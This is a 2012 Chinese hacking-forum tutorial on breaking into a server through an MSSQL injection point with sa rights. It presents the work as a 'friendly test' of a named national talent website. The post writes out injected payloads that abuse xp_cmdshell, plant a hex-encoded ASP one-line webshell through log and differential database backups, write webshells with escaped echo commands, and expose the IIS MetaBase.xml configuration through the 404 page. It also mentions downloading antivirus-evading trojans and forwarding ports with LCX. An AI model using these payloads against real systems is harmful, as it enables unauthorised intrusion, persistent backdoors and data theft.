找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2230|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
# D0 A' q  ~4 j3 q, n6 L+ F8 m- G/ p, p
" |  @4 }4 a4 o+ G1 P9 t
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。- ]5 v$ k1 D- g9 B- V, r

& i% Y$ Z' e; }; e) c3 Y' {                                                                 ! O1 I) k& L  c8 r( y3 ]/ J5 Q
                                                                 
) w; N# U- ~7 }; D7 T3 S8 k2 P/ A                                                                  论坛: http://www.90team.net/
# E4 [& v  u' G- r. @5 `* ]+ O3 a+ `
, x! j' m" n- K2 m0 H
; n' k  u& Q! r/ `* h" `' A
% j4 N, g. [9 ?/ l- ^# _1 R友情检测国家人才网
" q0 K3 U& Z# G5 \# e. y1 G" }6 p6 x7 _1 u
% L/ o* y* i! ~
内容:MSSQL注入SA权限不显错模式下的入侵4 \1 V, w' |" F. i, Q

( X9 w* T& \+ p" z- X* V; E
8 u, k6 f7 G' d8 d* U. S% B一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
4 `9 P- Z  k7 C& P; F
% D  D# R% f% M2 w! O我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。! f1 _) Z+ }% f/ Y# ~
# f- t. C6 o  w9 P# c
3 `  }% A. o8 I% d: j: H# }
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
6 o. S  z5 m* \% `/ D3 R
" F# U; ?$ l2 T# v1 g思路:9 b% L( J1 R4 X; u+ z5 o
# L; u  i8 m1 E" H/ V! V
首先:3 u" H  l( T! a+ X( g9 h

! o" \4 _# Y! |3 ?' Z5 }5 t) G# v% n通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
" j/ K# y+ D3 s0 ?
9 w% \2 _* j7 y. _3 _/ a1.日志备份获得Webshell& ^9 P; L. q/ T9 R2 }' |
9 t2 g% j# e1 ^  D$ h2 ?
2.数据库差异备份获得Webshell) q0 S7 X, \4 s+ A! g' P. }& s

. n! x" T, A3 x! l% o4.直接下载免杀远控木马。
, M! D" ]* y- S  W6 |7 ?7 W% [8 P/ {( s1 P( ~+ z
5.直接下载LCX将服务器端口转发出来, Z7 q* n) e2 n! t

4 R2 W5 A8 D: J* k4 H, N/ C0 E+ v6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
+ M2 _9 \1 C9 T4 B3 p- z2 L. k) r

  [  K: }. E1 o% b/ K% k7 S- O
$ F" v8 @- X. d* [在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
+ o1 h2 y# D2 J# I& x# D1 }  d; f6 D
我直接演示后面一个方法. [% o6 l6 {: {8 [0 C

' J) r% ]( Q# I* z
; s4 `; _7 T. _9 E. _: t分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
% j! E, C. [- d* }/ o; X! T. L" }9 z4 N1 c8 t5 @% n
3 U1 a1 h; v9 k0 [5 m8 v
; O  ?( [9 g7 Q0 O9 y1 b; G" ^, g; M

# \$ v& e; f  O4 M1 K6 {: ~4 R" C( e◆日志备份:+ l1 E- t# D. V, S5 Q9 n9 |

/ B9 k- l* U6 s! B$ f0 d7 v1 _7 O( x1 e1 v( A9 I3 k
1. 进行初始备份
: M3 |- U, j5 \+ v8 `: f* T) i; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
7 u: X1 z/ [$ q9 Y: F8 Y, s) Z) @5 ^5 Z. j# \# x
2. 插入数据
( A/ \" y% C' l( g  x;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
6 p" X+ M; ]# O4 x# ~' L) S
7 f) h$ c; _' Q3 z' B$ x0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>6 w  h) `3 i" F# r- c% ]* }  v
  
6 {8 W$ N4 V/ T1 S3. 备份并获得文件,删除临时表
1 o/ ]' H: @9 V4 ?# w: O+ X;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--) O; Q4 }7 V2 @$ e; q/ i

! W- B# d. }% D; l
3 A3 T% d, H. P- d) J, e3 E& ~, V( O- C
◆数据库差异备份' w+ v& I" t6 E! p. A6 R- T: }
8 Q) B7 d+ W. n! l+ @; ?9 @
(1. 进行差异备份准备工作: B& N/ y- w- G% m

2 l& A5 e+ I1 ^3 r$ ?;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
. F. v! E2 Q; s5 n) m) I5 u
% R" f2 E& N! P4 F7 b5 b3 e上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
+ f/ L& q6 K/ w* V. |! w % H$ K7 z( e) T( z

0 t0 U& w* U& H7 l+ C* K- A(2. 将数据写入到数据库
0 h: |2 @+ M6 I;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- / M' _! Q4 `0 n: V" `- m! R
2 A' b. w8 X2 o" U  L. ~$ F
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
- T: s; s: _8 _& `" n4 y! r4 w; p
3. 备份数据库并清理临时文件
1 R6 t$ u( L$ M9 j# l, T  ?
& _: X  ]2 U# B4 q% M0 H+ m. z;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--& w8 i4 N& K2 z4 X7 ]9 P

, Y, M; _' m9 x9 L) q0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
9 @: u9 `( x3 c/ T
% c- i2 c* T5 l5 u7 S: g
: Y2 K0 ?4 M; d0 c2 |
5 P  K, j, q  Z; W$ w用^转义字符来写ASP(一句话木马)文件的方法:   
5 q, n! G8 _: ]! h, o- P* j+ z
! t( ^/ n5 J3 _) [1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
( W8 ~7 v) h* |. Q5 {( x, P: V( F, \9 `, d, o  V7 g
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
! M5 t' F0 K1 R  b! \+ k* p5 N4 k, D# E# j( C6 E
读取IIS配置信息获取web路径
- i8 ~- b8 P) q' h( ?& O3 [, E3 g& ?- ]* }7 x, h1 m, u
     
  A" t) R, q) _' |/ Q# \     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--) T( f/ Y8 X8 Z. d

7 A! @0 c+ ~( g: ]+ O' `执行命令% ?4 d& v8 L% |1 f  f1 Y( x4 W3 P
     
2 j2 Y6 ?- h% R! m+ V6 Y4 h     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--$ Z# z3 P9 O4 J& n$ ]1 h

$ g% P, l/ X6 X  s$ J2 o$ @0 ^
) {+ R! u9 A. q1 D1 f2 f6 W! |: u3 N  R
6 u0 p# J" T" n
0 }. G, z3 s( A9 P" f

" w0 V8 T' A0 q* o; d2 x% X& n! X6 Q  _! {' q2 M% k
1 H; t% r+ X- W6 _* q; a
0 X' o) H& C; G6 H6 v$ Q
8 \! `8 F" P5 O1 Y( b0 x

. K- k  C( w! s& F' G5 Q: h9 q6 C0 p8 `* }! T& R

& S5 u$ P( l' G9 t, N' B- \# E) [' R! i: m1 I0 h5 P0 _

* [2 y2 \* `7 U3 v# S/ e
$ ~3 h9 E+ d5 V6 I+ |; I* G
, m+ ^* j  P0 P0 |) f) i% z* D2 }! d+ F/ j* ]
, i0 g1 O/ _+ ]$ r7 T; y+ M/ K( l$ |

; ]  C1 z( r+ q/ M8 \# o, Z+ B3 c- e$ c9 O# Y

, o2 }6 K4 c8 ^) l$ s3 X5 p1 g+ \- f# W' [) X

. c* a  h+ G% p# v- ~5 n% }
7 d; t. d4 L. T- v* X
/ I. C4 y! u2 l6 b' q* R; `
. U; K" j& q5 A+ ~
; n6 w0 l3 p8 D, ^- i5 v- u7 ?& Z7 U7 q
3 Z/ ?/ ?0 J. i

! B1 I+ G5 ]! R% L- @/ I5 @4 U" o& Q. H

) @0 Z3 ^, N6 W- B) U+ D8 V  X6 p( m- f

' h. |1 q7 W0 x! T: G
/ o7 C& [$ m! F. l4 K8 {
. ~3 H* o8 `5 s7 t% u  s
# u- P% A. _* T4 {8 m+ Q' l1 j4 {# ^7 v* r; _

/ H- P1 Y, P; b8 M+ W; Z* W
* {; y% S2 c- L6 S: V! N( Z; m
" @, S' I" |5 b( y: G
+ Y/ c; t; `4 Q! B9 |1 H7 c: }; T" G8 w& i

, M2 |3 r, Q& U
: v2 Y8 b# d6 g
+ q6 D) A, S' d4 r2 v2 W; p+ A1 e; y, H0 q) A. w0 ]" S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表